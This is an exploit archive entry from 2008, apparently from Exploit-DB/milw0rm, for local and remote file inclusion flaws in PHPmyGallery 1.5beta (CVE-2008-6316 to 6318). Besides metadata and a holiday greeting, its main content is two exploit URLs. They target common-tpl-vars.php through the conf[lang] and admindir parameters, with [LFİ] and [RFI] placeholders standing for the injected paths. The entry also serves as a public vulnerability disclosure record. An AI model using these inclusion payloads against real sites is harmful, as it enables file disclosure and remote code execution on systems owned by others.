PHPmyGallery 1.5beta - '/common-tpl-vars.php' Local/Remote File Inclusion
Author: CoBRa_21
type: webapps
platform: php
port:
date_added: 2008-12-08
date_updated: 2017-01-04
verified: 1
codes: OSVDB-52751;CVE-2008-6318;OSVDB-52333;CVE-2008-6317;CVE-2008-6316
tags:
aliases:
screenshot_url:
application_url:
*****************************************************************************************
Phpmygallery-1.5beta (common-tpl-vars.php) Multiple Local File Inclusion Vulnerabilities
*****************************************************************************************
Script Name: Phpmygallery
Version: 1.5beta
Autor: CoBRa_21
My Site: www.ipbul.org
Download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.5beta.zip
*****************************************************************************************
Exploit:
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?conf[lang]= [LFİ] (Windows Only)
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?admindir=[RFI]
*****************************************************************************************
Not: Tüm İslam Aleminin Kurban Bayramı Mobarek Olsun
*****************************************************************************************
# milw0rm.com [2008-12-09]